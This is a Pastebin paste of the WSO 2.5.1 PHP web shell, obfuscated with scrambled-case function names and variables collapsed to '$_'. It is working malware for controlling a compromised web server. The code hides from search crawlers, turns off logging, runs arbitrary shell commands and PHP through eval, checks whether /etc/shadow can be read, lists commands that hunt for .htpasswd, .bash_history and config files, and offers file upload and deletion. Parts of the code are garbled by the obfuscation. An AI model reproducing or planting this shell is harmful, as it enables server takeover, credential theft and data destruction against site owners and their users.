Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php $_ = "#df5";
- $_ = "FilesMan";
- $_ = true;
- $default_charset = "Windows-1251";
- if (!empty
- ($_SERVER["HTTP_USER_AGENT"])):
- $_ = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
- if (prEg_mATcH("/" . implOdE("|", $_) . "/i", $_SERVER["HTTP_USER_AGENT"])):
- heaDER("HTTP/1.0 404 Not Found");
- exit;
- endif;
- endif;
- @InI_SEt("error_log", null);
- @iNi_set("log_errors", 00
- );
- @iNi_SEt("max_execution_time", 00);
- @Set_tiMe_lImIt(00);
- @sEt_MaGIc_QUOtEs_RUnTIMe(00
- );
- @dEFIne("WSO_VERSION", "2.5.1");
- if (GEt_maGic_QuotES_GPC()):
- function _($_) {
- return IS_Array($_) ? ARray_maP("_", $_) : sTrIpSLashes($_);
- }
- $_POST = _($_POST);
- $_COOKIE = _($_COOKIE);
- endif;
- function _() {
- die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
- }
- function _($_, $_) {
- $_COOKIE[$_] = $_;
- seTCOOkIe($_, $_);
- }
- if (!empty($auth_pass)):
- if (isset
- ($_POST["pass"]) && (MD5($_POST["pass"]) == $auth_pass)):
- _(mD5($_SERVER["HTTP_HOST"]), $auth_pass);
- endif;
- if (!isset($_COOKIE[Md5($_SERVER["HTTP_HOST"]) ]) || ($_COOKIE[md5($_SERVER["HTTP_HOST"]) ] !=
- $auth_pass)):
- _();
- endif;
- endif;
- if (sTrtOLowEr(SuBstR(PHP_OS, 00, 03
- )) == "win"):
- $os = "win";
- else:
- $os = "nix";
- endif;
- $safe_mode = @iNI_Get("safe_mode");
- if (!$safe_mode):
- ERroR_REPORting(00);
- endif;
- $disable_functions = @Ini_GEt("disable_functions");
- $home_cwd = @GeTCwd();
- if (isset($_POST["c"])):
- @cHDIr($_POST["c"]);
- endif;
- $cwd = @gETcwD();
- if ($os ==
- "win"):
- $home_cwd = sTR_rePLaCe("\"," / ",$home_cwd);$cwd=StR_rEPlaCE("\"," / ",$cwd);endif;if($cwd[sTRlen($cwd) - 01]!=" / "):$cwd.=" / ";endif;if(!isset($_COOKIE[md5($_SERVER["HTTP_HOST"])."ajax"])):$_COOKIE[mD5($_SERVER["HTTP_HOST"])."ajax"]=(bool)$_;endif;if($os=="win"):$aliases=array("ListDirectory"=>"dir","Findindex . phpincurrentdir"=>"dir / s / w / bindex . php","Find * config * . phpincurrentdir"=>"dir / s / w / b * config * . php","Showactiveconnections"=>"netstat - an","Showrunningservices"=>"netstart","Useraccounts"=>"netuser","Showcomputers"=>"netview","ARPTable"=>"arp - a","IPConfiguration"=>"ipconfig / all");else:$aliases=array("Listdir"=>"ls - lha","listfileattributesonaLinuxsecondextendedfilesystem"=>"lsattr - va","showopenedports"=>"netstat - an | grep - ilisten","processstatus"=>"psaux","Find"=>"","findsuid"=>"find / -typef - perm - 04000 - ls","findsuidincurrentdir"=>"find . -typef - perm - 04000 - ls","findsgid"=>"find / -typef - perm - 02000 - ls","findsgidfilesincurrentdir"=>"find . -typef - perm - 02000 - ls","findconfig . inc . php"=>"find / -typef - nameconfig . inc . php","findconfig * "=>"find / -typef - name"config*"","findconfig * incurrentdir"=>"find . -typef - name"config*"","findwritablefolders and files"=>"find / -perm - 2 - ls","findwritablefolders and filesincurrentdir"=>"find . -perm - 2 - ls","findservice . pwd"=>"find / -typef - nameservice . pwd","findservice . pwdfilesincurrentdir"=>"find . -typef - nameservice . pwd","find . htpasswd"=>"find / -typef - name . htpasswd","find . htpasswdfilesincurrentdir"=>"find . -typef - name . htpasswd","find . bash_history"=>"find / -typef - name . bash_history","find . bash_historyfilesincurrentdir"=>"find . -typef - name . bash_history","find . fetchmailrc"=>"find / -typef - name . fetchmailrc","find . fetchmailrcfilesincurrentdir"=>"find . -typef - name . fetchmailrc","Locate"=>/*Bloodninja: Well, first they would say, "Hello, thisisPapaJohn's, how may I help you", then they tell you the specials, and then you would make your order. So that'sanX - Large . Whattoppingsdo youwant ? * /"", "locate httpd.conf" =>
- "locate httpd.conf", "locate vhosts.conf" => "locate vhosts.conf", "locate proftpd.conf" =>
- "locate proftpd.conf", "locate psybnc.conf" => "locate psybnc.conf", "locate my.conf" => "locate my.conf", "locate admin.php" => "locate admin.php", "locate cfg.php" => "locate cfg.php", "locate conf.php" => "locate conf.php", "locate config.dat" => "locate config.dat", "locate config.php" =>
- "locate config.php", "locate config.inc" => "locate config.inc", "locate config.inc.php" =>
- "locate config.inc.php", "locate config.default.php" => "locate config.default.php", "locate config*" => "locate config", "locate .conf" =>
- "locate '.conf'", "locate .pwd" =>
- "locate '.pwd'", "locate .sql" => "locate '.sql'", "locate .htpasswd" => "locate '.htpasswd'", "locate .bash_history" =>
- "locate '.bash_history'", "locate .mysql_history" => "locate '.mysql_history'", "locate .fetchmailrc" =>
- "locate '.fetchmailrc'", "locate backup" => "locate backup", "locate dump" => "locate dump", "locate priv" => "locate priv");
- endif;
- function _() {
- if (empty($_POST["charset"])) : $_POST["charset"] = $GLOBALS["default_charset"];
- endif;
- global $_;
- echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . "'><title>" . $_SERVER["HTTP_HOST"] . " - WSO " . WSO_VERSION . "</title>
- <style>
- body{background-color:#444;color:#e1e1e1;}
- body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
- table.info{ color:#fff;background-color:#222; }
- span,h1,a{ color: " . $_ . " !important; }
- span{ font-weight: bolder; }
- h1{ border-left:5px solid " . $_ . ";padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
- div.content{ padding: 5px;margin-left:5px;background-color:#333; }
- a{ text-decoration:none; }
- a:hover{ text-decoration:underline; }
- .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
- .bigarea{ width:100%;height:300px; }
- input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid " . $_ . "; font: 9pt Monospace,'Courier New'; }
- form{ margin:0px; }
- #toolsTbl{ text-align:center; }
- .toolsInp{ width: 300px }
- .main th{text-align:left;background-color:#5e5e5e;}
- .main tr:hover{background-color:#5e5e5e}
- .l1{background-color:#444}
- .l2{background-color:#333}
- pre{font-family:Courier,Monospace;}
- </style>
- <script>
- var c_ = '" . hTmlSpeCIAlChARS($GLOBALS["cwd"]) . "';
- var a_ = '" . HTMlSpecIalCHars(@$_POST["a"]) . "'
- var charset_ = '" . hTmLSpEcIAlcHArS(@$_POST["charset"]) . "';
- var p1_ = '" . ((sTrPOs(@$_POST["p1"], "
- ") !==
- false
- ) ? "" : htMlsPECIalcHars($_POST["p1"], 3
- )) . "';
- var p2_ = '" . ((sTRpOs(@$_POST["p2"], "
- ") !==
- false) ? "" : htMLspEciAlChaRS($_POST["p2"], 3
- )) . "';
- var p3_ = '" . ((STRpOs(@$_POST["p3"], "
- ") !== false) ? "" : hTMLsPEciaLChARs($_POST["p3"], 3)) . "';
- var d = document;
- function set(a,c,p1,p2,p3,charset) {
- if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
- if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
- if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
- if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
- if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
- if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
- }
- function g(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- d.mf.submit();
- }
- function a(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- var params = 'ajax=true';
- for(i=0;i<d.mf.elements.length;i++)
- params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
- sr('" . ADdslasHES($_SERVER["REQUEST_URI"]) . "', params);
- }
- function sr(url, params) {
- if (window.XMLHttpRequest)
- req = new XMLHttpRequest();
- else if (window.ActiveXObject)
- req = new ActiveXObject('Microsoft.XMLHTTP');
- if (req) {
- req.onreadystatechange = processReqChange;
- req.open('POST', url, true);
- req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
- req.send(params);
- }
- }
- function processReqChange() {
- if( (req.readyState == 4) )
- if(req.status == 200) {
- var reg = new RegExp("(\d +) ([\S\s] *) ", 'm');
- var arr=reg.exec(req.responseText);
- eval(arr[2].substr(0, arr[1]));
- } else alert('Request error!');
- }
- </script>
- <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
- <form method=post name=mf style='display:none;'>
- <input type=hidden name=a>
- <input type=hidden name=c>
- <input type=hidden name=p1>
- <input type=hidden name=p2>
- <input type=hidden name=p3>
- <input type=hidden name=charset>
- </form>";
- $_ = @diSKfREeSPAce($GLOBALS["cwd"]);
- $_ = @dISK_TOTAL_SpacE($GLOBALS["cwd"]);
- $_ = $_ ? $_ : 01 ;
- $_ = @php_unAME("r");
- $_ = @pHP_uNAME("s");
- $_ = "http://exploit-db.com/search/?action=search&filter_description=";
- if (STRpOs("Linux", $_) !== false
- ):
- $_.=
- urleNCODE("Linux Kernel " . sUBstr($_, 00, 06
- ));
- else:
- $_.=
- urLeNcoDe($_ . " " . subStr($_, 00 , 03));
- endif;
- if (!fUnctIoN_exIStS("posix_getegid")):
- $_ = @geT_CurrEnT_User();
- $_ = @getmyUiD();
- $_ = @GeTmygId();
- $_ = "?";
- else:
- $_ = @POSix_GeTPWUid(pOSIx_GetEuiD());
- $_ = @pOSIX_getgRGID(pOSiX_getEGid());
- $_ = $_["name"];
- $_ = $_["uid"];
- $_ = $_["name"];
- $_ = $_["gid"];
- endif;
- $_ = "";
- $_ = ExploDE("/", $GLOBALS["cwd"]);
- $_ = CoUnT($_);
- for ($_ = 00 ;$_ < $_ - 01;
- $_++):
- $_.=
- "<a href='#' onclick='g("FilesMan","";for($_=00;$_<=$_;$_++):$_.=$_[$_]." / ";endfor;$_.="")'>" . $_[$_] . "/</a>";
- endfor;
- $_ = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866");
- $_ = "";
- foreach ($_ as $_):
- $_.= "<option value="".$_."" " . ($_POST["charset"] == $_ ? "selected" : "") . ">" . $_ . "</option>";
- endforeach;
- $_ = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Sql" =>
- "Sql", "Php" => "Php", "String tools" => "StringTools", "Bruteforce" =>
- "Bruteforce", "Network" => "Network");
- if (!empty
- ($GLOBALS["auth_pass"])):
- $_["Logout"] = "Logout";
- endif;
- $_["Self remove"] = "SelfRemove";
- $_ = "";
- foreach ($_ as $_ => $_):
- $_.= "<th width="".(int)(0144/cOuNt($_))." % ">[ <a href=" #" onclick="g('".$_."',null,'','','')">".$_."</a> ]</th>";endforeach;$_="";if($GLOBALS["os"]=="win"):foreach(RAngE("c","z") as$_):if(iS_DIR($_.":\")):$_.="<a href="#" onclick="g('FilesMan','".$_.":/')">[ ".$_." ]</a> ";endif;endforeach;endif;echo"<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:".($GLOBALS["os"]=="win"?"<br>Drives:":"")."</span></td>"."<td><nobr>".substR(@phP_UNaME(),00,0170)." <a href="".$_."" target=_blank>[exploit-db.com]</a></nobr><br>".$_." ( ".$_." ) <span>Group:</span> ".$_." ( ".$_." )<br>".@pHpVErsiON()." <span>Safe mode:</span> ".($GLOBALS["safe_mode"]?"<font color=red>ON</font>":"<font color=green><b>OFF</b></font>")." <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> ".DaTE("Y-m-d H:i:s")."<br>"._($_)." <span>Free:</span> "._($_)." (".(int)($_/$_*0144)."%)<br>".$_." "._($GLOBALS["cwd"])." <a href=# onclick="g('FilesMan','".$GLOBALS["home_cwd"]."','','','')">[ home ]</a><br>".$_."</td>"."<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">".$_."</optgroup></select><br><span>Server IP:</span><br>".@$_SERVER["SERVER_ADDR"]."<br><span>Client IP:</span><br>".$_SERVER["REMOTE_ADDR"]."</nobr></td></tr></table>"."<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>".$_."</tr></table><div style="margin:5">";}function _(){$_=iS_wRItAble($GLOBALS["cwd"])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>";echo"
- < / div > < tableclass = infoid = toolsTblcellpadding = 3cellspacing = 0width = 100 % style = 'border-top:2px solid #333;border-bottom:2px solid #333;' > < tr > < td > < formonsubmit = 'g(null,this.c.value,"");return false;' > < span > Changedir: < / span > < br > < inputclass = 'toolsInp'type = textname = cvalue = '".htMLsPECIaLCHARS($GLOBALS["cwd"])."' > < inputtype = submitvalue = '>>' > < / form > < / td > < td > < formonsubmit = "g('FilesTools',null,this.f.value);return false;" > < span > Readfile: < / span > < br > < inputclass = 'toolsInp'type = textname = f > < inputtype = submitvalue = '>>' > < / form > < / td > < / tr > < tr > < td > < formonsubmit = "g('FilesMan',null,'mkdir',this.d.value);return false;" > < span > Makedir: < / span > ".$_." < br > < inputclass = 'toolsInp'type = textname = d > < inputtype = submitvalue = '>>' > < / form > < / td > < td > < formonsubmit = "g('FilesTools',null,this.f.value,'mkfile');return false;" > < span > Makefile: < / span > ".$_." < br > < inputclass = 'toolsInp'type = textname = f > < inputtype = submitvalue = '>>' > < / form > < / td > < / tr > < tr > < td > < formonsubmit = "g('Console',null,this.c.value);return false;" > < span > Execute: < / span > < br > < inputclass = 'toolsInp'type = textname = cvalue = '' > < inputtype = submitvalue = '>>' > < / form > < / td > < td > < formmethod = 'post'ENCTYPE = 'multipart/form-data' > < inputtype = hiddenname = avalue = 'FilesMAn' > < inputtype = hiddenname = cvalue = '".$GLOBALS["cwd"]."' > < inputtype = hiddenname = p1value = 'uploadFile' > < inputtype = hiddenname = charsetvalue = '".(isset($_POST["charset"])?$_POST["charset"]:"")."' > < span > Uploadfile: < / span > ".$_." < br > < inputclass = 'toolsInp'type = filename = f > < inputtype = submitvalue = '>>' > < / form > < br > < / td > < / tr > < / table > < / div > < / body > < / html > ";}if(!fuNctioN_ExISts("posix_getpwuid")&&(strpOs($GLOBALS["disable_functions"],"posix_getpwuid")===false)):function POsiX_geTPWUID($_){return false;}endif;if(!fuNcTIOn_exisTs("posix_getgrgid")&&(STRPoS($GLOBALS["disable_functions"],"posix_getgrgid")===false)):function pOSix_GETgRgId($_){return false;}endif;function _($_){$_ = "";
- if (FUNcTIoN_ExIStS("exec")):
- @ExEc($_, $_);
- $_ = @joIN("
- ", $_);
- elseif (funCtiOn_exISts("passthru")):
- Ob_StaRt();
- @PasStHRu($_);
- $_ = OB_GeT_cLEAN();
- elseif (funCtION_exIstS("system")):
- Ob_stARt();
- @SyStEm($_);
- $_ = oB_Get_ClEAn();
- elseif (function_eXIsTs("shell_exec")):
- $_ = sHEll_EXEc($_);
- elseif (IS_ReSourcE($_ = @pOPeN($_, "r"))):
- $_ = "";
- while (!@feOF($_)):
- $_.= fReAd($_, 02000
- );
- endwhile;
- pCloSE($_);
- endif;
- return $_;
- }function _($_){if(iS_INt($_)):$_=sPrINtf(" % u",$_);endif;if($_>=010000000000):return sPrINTF(" % 1.2f",$_/010000000000)."GB";elseif($_>=04000000):return sprINTf(" % 1.2f",$_/04000000)."MB";elseif($_>=02000):return SpRINtf(" % 1.2f",$_/02000)."KB";else:return$_."B";endif;}function _($_){if(($_&0140000)==0140000):$_="s";elseif(($_&0120000)==0120000):$_="l";elseif(($_&0100000)==0100000):$_=" - ";elseif(($_&060000)==060000):$_="b";elseif(($_&040000)==040000):$_="d";elseif(($_&020000)==020000):$_="c";elseif(($_&010000)==010000):$_="p";else:$_="u";endif;$_.=(($_&0400)?"r":" - ");$_.=(($_&0200)?"w":" - ");$_.=(($_&0100)?(($_&04000)?"s":"x"):(($_&04000)?"S":" - "));$_.=(($_&040)?"r":" - ");$_.=(($_&020)?"w":" - ");$_.=(($_&010)?(($_&02000)?"s":"x"):(($_&02000)?"S":" - "));$_.=(($_&04)?"r":" - ");$_.=(($_&02)?"w":" - ");$_.=(($_&01)?(($_&01000)?"t":"x"):(($_&01000)?"T":" - "));return$_;}function _($_){if(!@is_ReadabLe($_)):return" < fontcolor = #FF0000>"._(@fILeperMS($_))."</font>";elseif(!@IS_WriTAble($_)):return"<font color=white>"._(@fiLepErmS($_))."</font>";else:return"<font color=#25ff00>"._(@fiLEPERMs($_))."</font>";endif;}function _($_){if(functioN_EXIstS("scandir")):return sCanDiR($_);else:$_=OpEnDir($_);while(false!==($_=rEadDIr($_))):$_[]=$_;endwhile;return$_;endif;}function _($_){$_=_("which ".$_);if(!empty($_)):return$_;endif;return false;}function actIonSEcInfo(){_();echo"<h1>Server security information</h1><div class=content>";function _($_,$_){$_=Trim($_);if($_):echo"<span>".$_.": </span>";if(sTrPOS($_,"
- ")===false):echo$_." < br > ";else:echo" < preclass = ml1 > ".$_." < / pre > ";endif;endif;}_("Serversoftware",@geTENV("SERVER_SOFTWARE"));if(FunCtIon_EXIsTs("apache_get_modules")):_("LoadedApachemodules",imPLoDE(", ",APAChE_GEt_mOduLES()));endif;_("DisabledPHPFunctions",$GLOBALS["disable_functions"]?$GLOBALS["disable_functions"]:"none");_("Openbasedir",@Ini_Get("open_basedir"));_("Safemodeexecdir",@iNI_GET("safe_mode_exec_dir"));_("Safemodeinclude dir",@inI_Get("safe_mode_include_dir"));_("cURLsupport",fuNcTiON_exists("curl_version")?"enabled":"no");$_=array();if(funCtioN_ExiSTs("mysql_get_client_info")):$_[]="MySql(".Mysql_geT_CLienT_inFO().") ";endif;if(funCtIoN_exISTs("mssql_connect")):$_[]="MSSQL";endif;if(funCTion_ExisTS("pg_connect")):$_[]="PostgreSQL";endif;if(FUnctIoN_EXISTS("oci_connect")):$_[]="Oracle";endif;_("Supporteddatabases",iMPLodE(", ",$_));echo" < br > ";if($GLOBALS["os"]=="nix"):_("Readable / etc / passwd",@is_rEADABle(" / etc / passwd")?"yes < ahref = '#'onclick = 'g("FilesTools", "/etc/", "passwd")' > [view] < / a > ":"no");_("Readable / etc / shadow",@IS_reaDAbLe(" / etc / shadow")?"yes < ahref = '#'onclick = 'g("FilesTools", "/etc/", "shadow")' > [view] < / a > ":"no");_("OSversion",@FIlE_get_cONteNtS(" / proc / version"));_("Distrname",@FILe_Get_CoNTENTs(" / etc / issue . net"));if(!$GLOBALS["safe_mode"]):$_=array("gcc","lcc","cc","ld","make","php","perl","python","ruby","tar","gzip","bzip","bzip2","nc","locate","suidperl");$_=array("kav","nod32","bdcored","uvscan","sav","drwebd","clamd","rkhunter","chkrootkit","iptables","ipfw","tripwire","shieldcc","portsentry","snort","ossec","lidsadm","tcplodg","sxid","logcheck","logwatch","sysmask","zmbscap","sawmill","wormscan","ninja");$_=array("wget","fetch","lynx","links","curl","get","lwp - mirror");echo" < br > ";$_=array();foreach($_ as$_):if(_($_)):$_[]=$_;endif;endforeach;_("Userful",ImplODE(", ",$_));$_=array();foreach($_ as$_):if(_($_)):$_[]=$_;endif;endforeach;_("Danger",IMplODE(", ",$_));$_=array();foreach($_ as$_):if(_($_)):$_[]=$_;endif;endforeach;_("Downloaders",imPLoDE(", ",$_));echo" < br / > ";_("HDDspace",_("df - h"));_("Hosts",@FiLE_geT_coNTEnTS(" / etc / hosts"));echo" < br / > < span > posix_getpwuid("Read" / etc / passwd) < / span > < table > < formonsubmit = 'g(null,null,"5",this.param1.value,this.param2.value);return false;' > < tr > < td > From < / td > < td > < inputtype = textname = param1value = 0 > < / td > < / tr > < tr > < td > To < / td > < td > < inputtype = textname = param2value = 1000 > < / td > < / tr > < / table > < inputtype = submitvalue = ">>" > < / form > ";if(isset($_POST["p2"],$_POST["p3"])&&IS_nuMeriC($_POST["p2"])&&IS_numeRIc($_POST["p3"])):$_="";for(;$_POST["p2"]<=$_POST["p3"];$_POST["p2"]++):$_=@posiX_GETPwUId($_POST["p2"]);if($_):$_.=JoiN(":
- ",$_)."";endif;endfor;echo" < br / > ";_("Users",$_);endif;endif;else:_("OSVersion",_("ver"));_("AccountSettings",_("netaccounts"));_("UserAccounts",_("netuser"));endif;echo" < / div > ";_();}function ActiOnPHp(){if(isset($_POST["ajax"])):_(mD5($_SERVER["HTTP_HOST"])."ajax",true);Ob_STArt();eval($_POST["p1"]);$_="document . getElementById('PhpOutput') . style . display = '';
- document . getElementById('PhpOutput') . innerHTML = '".adDCSLAsHES(HTMlsPecIALchARs(OB_GET_CLEaN()),"
- \'")."';
- ";echo STrlEN($_),"",$_;exit;endif;if(empty($_POST["ajax"])&&!empty($_POST["p1"])):_(Md5($_SERVER["HTTP_HOST"])."ajax",00);endif;_();if(isset($_POST["p2"])&&($_POST["p2"]=="info")):echo" < h1 > PHPinfo < / h1 > < divclass = content > < style > . p {
- color: #000;}</style>";ob_sTArT();pHpinFo();$_=Ob_gET_cLEAN();$_=pREG_ReplACE(array("!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU","!td, th {(.*)}!msiU","!<img[^>]+>!msiU",),array("",".e, .v, .h, .h th {$1}",""),$_);echo STR_rePlACE("<h1","<h2",$_)."</div><br>";endif;echo"<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>".(!empty($_POST["p1"])?hTMLsPEcIAlcHARs($_POST["p1"]):"")."</textarea><input type=submit value=Eval style="margin-top:5px">";echo" <input type=checkbox name=ajax value=1 ".($_COOKIE[MD5($_SERVER["HTTP_HOST"])."ajax"]?"checked":"")."> send using AJAX</form><pre id=PhpOutput style="".(empty($_POST["p1"])?"display:none;":"")."margin-top:5px;" class=ml1>";if(!empty($_POST["p1"])):ob_start();eval($_POST["p1"]);echo hTmLSpecIAlchARS(ob_get_cLeAN());endif;echo"</pre></div>";_();}function actIONfIleSMan(){if(!empty($_COOKIE["f"])):$_COOKIE["f"]=@uNseriaLIze($_COOKIE["f"]);endif;if(!empty($_POST["p1"])):switch($_POST["p1"]):case "uploadFile":if(!@MovE_UpLOAded_fIle($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])):echo"Can't upload!";endif;break;case "mkdir":if(!@MKDiR($_POST["p2"])):echo"Can't create!";endif;break;case "delete":function _($_){$_=(sUBStR($_,-01)=="/")?$_:$_."/";$_=oPenDiR($_);while(($_=REaDDIr($_))!==false):$_=$_.$_;if((BaseName($_)=="..")||(BAsenAME($_)==".")):continue;endif;$_=FilETyPe($_);if($_=="dir"):_($_);else:@UnLinK($_);endif;endwhile;clOSediR($_);@RMDir($_);}if(IS_ARRay(@$_POST["f"])):foreach($_POST["f"] as$_):if($_==".."):continue;endif;$_=URlDEcode($_);if(is_DiR($_)):_($_);else:@UnLiNk($_);endif;endforeach;endif;break;case "paste":if($_COOKIE["act"]=="copy"):function _($_,$_,$_){if(is_dir($_.$_)):MkdIr($_.$_);$_=@opENdIr($_.$_);while(($_=@ReaddIr($_))!==false):if(($_!=".") and ($_!="..")):_($_.$_."/",$_,$_.$_."/");endif;endwhile;elseif(IS_fILe($_.$_)):@coPY($_.$_,$_.$_);endif;}foreach($_COOKIE["f"] as$_):_($_COOKIE["c"],$_,$GLOBALS["cwd"]);endforeach;elseif($_COOKIE["act"]=="move"):function _($_,$_,$_){if(iS_diR($_.$_)):mKDIr($_.$_);$_=@OPENDIR($_.$_);while(($_=@rEaddiR($_))!==false):if(($_!=".") and ($_!="..")):_($_.$_."/",$_,$_.$_."/");endif;endwhile;elseif(@iS_File($_.$_)):@cOPy($_.$_,$_.$_);endif;}foreach($_COOKIE["f"] as$_):@REnAmE($_COOKIE["c"].$_,$GLOBALS["cwd"].$_);endforeach;elseif($_COOKIE["act"]=="zip"):if(ClASs_ExiSTs("ZipArchive")):$_=new ZiPArcHiVe();if($_->OPEN($_POST["p2"],01)):CHDiR($_COOKIE["c"]);foreach($_COOKIE["f"] as$_):if($_==".."):continue;endif;if(@is_file($_COOKIE["c"].$_)):$_->aDdFilE($_COOKIE["c"].$_,$_);elseif(@iS_diR($_COOKIE["c"].$_)):$_=new RecursiveiteRatorITeRATOr(new RECURsivEDIrEcTORyiTERaTOr($_."/",fILESYsTeMiTeRATOr::SKIP_DOTS));foreach($_ as$_=>$_):$_->aDdfIle(reaLPatH($_),$_);endforeach;endif;endforeach;CHdIR($GLOBALS["cwd"]);$_->ClOsE();endif;endif;elseif($_COOKIE["act"]=="unzip"):if(cLaSs_EXIsts("ZipArchive")):$_=new zIpArchIvE();foreach($_COOKIE["f"] as$_):if($_->oPEN($_COOKIE["c"].$_)):$_->eXtRACTTo($GLOBALS["cwd"]);$_->CloSe();endif;endforeach;endif;elseif($_COOKIE["act"]=="tar"):cHDIR($_COOKIE["c"]);$_COOKIE["f"]=arRAy_map("escapeshellarg",$_COOKIE["f"]);_("tar cfzv ".esCApeShElLArg($_POST["p2"])." ".ImPlodE(" ",$_COOKIE["f"]));CHDiR($GLOBALS["cwd"]);endif;unset($_COOKIE["f"]);seTCoOKIE("f","",tIME()-07020);break;default:if(!empty($_POST["p1"])):_("act",$_POST["p1"]);_("f",sERiALiZe(@$_POST["f"]));_("c",@$_POST["c"]);endif;break;endswitch;endif;_();echo"<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>";$_=_(isset($_POST["c"])?$_POST["c"]:$GLOBALS["cwd"]);if($_===false):echo"Can't open this folder!";_();return;endif;global $sort;$sort=array("name",01);if(!empty($_POST["p1"])):if(PREG_mATCh("!s_([A-z]+)_(\d{1})!",$_POST["p1"],$_)):$sort=array($_[01],(int)$_[02]);endif;endif;echo"<script>
- function sa() {
- for (i = 0;i < d . files . elements . length;i++) if (d . files . elements[i] . type == 'checkbox') d . files . elements[i] . checked = d . files . elements[0] . checked;
- }
- </script>
- <table width='100%' class='main' cellspacing='0' cellpadding='2'>
- <form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_".($sort[01]?00:01)."")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_".($sort[01]?00:01)."")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_".($sort[01]?00:01)."")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_".($sort[01]?00:01)."")'>Permissions</a></th><th>Actions</th></tr>";$_=$_=array();$_=cOuNt($_);for($_=00;$_<$_;$_++):$_=@posix_GetpWuid(@fIleownEr($_[$_]));$_=@posiX_getGRGiD(@FIlEGroUP($_[$_]));$_=array("name"=>$_[$_],"path"=>$GLOBALS["cwd"].$_[$_],"modify"=>datE("Y-m-d H:i:s",@FILemTiME($GLOBALS["cwd"].$_[$_])),"perms"=>_($GLOBALS["cwd"].$_[$_]),"size"=>@FILESiZE($GLOBALS["cwd"].$_[$_]),"owner"=>$_["name"]?$_["name"]:@FILEowNer($_[$_]),"group"=>$_["name"]?$_["name"]:@FILEGrOUP($_[$_]));if(@iS_fILe($GLOBALS["cwd"].$_[$_])):$_[]=ArrAy_mErge($_,array("type"=>"file"));elseif(@iS_liNK($GLOBALS["cwd"].$_[$_])):$_[]=ARRaY_MerGe($_,array("type"=>"link","link"=>ReaDLiNK($_["path"])));elseif(@iS_DiR($GLOBALS["cwd"].$_[$_])):$_[]=arrAY_mERGe($_,array("type"=>"dir"));endif;endfor;$GLOBALS["sort"]=$sort;function _($_,$_){if($GLOBALS["sort"][00]!="size"):return StrcMp(STrTOLOweR($_[$GLOBALS["sort"][00]]),sTRTOLoWer($_[$GLOBALS["sort"][00]]))*($GLOBALS["sort"][01]?01:-01);else:return(($_["size"]<$_["size"])?-01:01)*($GLOBALS["sort"][01]?01:-01);endif;}usORT($_,"_");usort($_,"_");$_=ArRaY_MeRge($_,$_);$_=00;foreach($_ as$_):echo"<tr".($_?" class=l1":"")."><td><input type=checkbox name="f[]" value="".uRlEncodE($_["name"])."" class=chkbx></td><td><a href=# onclick="".(($_["type"]=="file")?"g('FilesTools',null,'".URlenCOdE($_["name"])."', 'view')">".HtmlSPECIALChaRs($_["name"]):"g('FilesMan','".$_["path"]."');" ".(empty($_["link"])?"":"title='".$_["link"]."'")."><b>[ ".HtMlsPEciaLCHArS($_["name"])." ]</b>")."</a></td><td>".(($_["type"]=="file")?_($_["size"]):$_["type"])."</td><td>".$_["modify"]."</td><td>".$_["owner"]."/".$_["group"]."</td><td><a href=# onclick="g('FilesTools',null,'".uRLencOdE($_["name"])."','chmod')">".$_["perms"]."</td><td><a href="#" onclick="g('FilesTools',null,'".URLencODe($_["name"])."', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'".uRlenCOdE($_["name"])."', 'touch')">T</a>".(($_["type"]=="file")?" <a href="#" onclick="g('FilesTools',null,'".uRLenCODe($_["name"])."', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'".UrLEnCOdE($_["name"])."', 'download')">D</a>":"")."</td></tr>";$_=$_?00:01;endforeach;echo"<tr><td colspan=7>
- <input type=hidden name=a value='FilesMan'>
- <input type=hidden name=c value='".htMlspECiaLCHarS($GLOBALS["cwd"])."'>
- <input type=hidden name=charset value='".(isset($_POST["charset"])?$_POST["charset"]:"")."'>
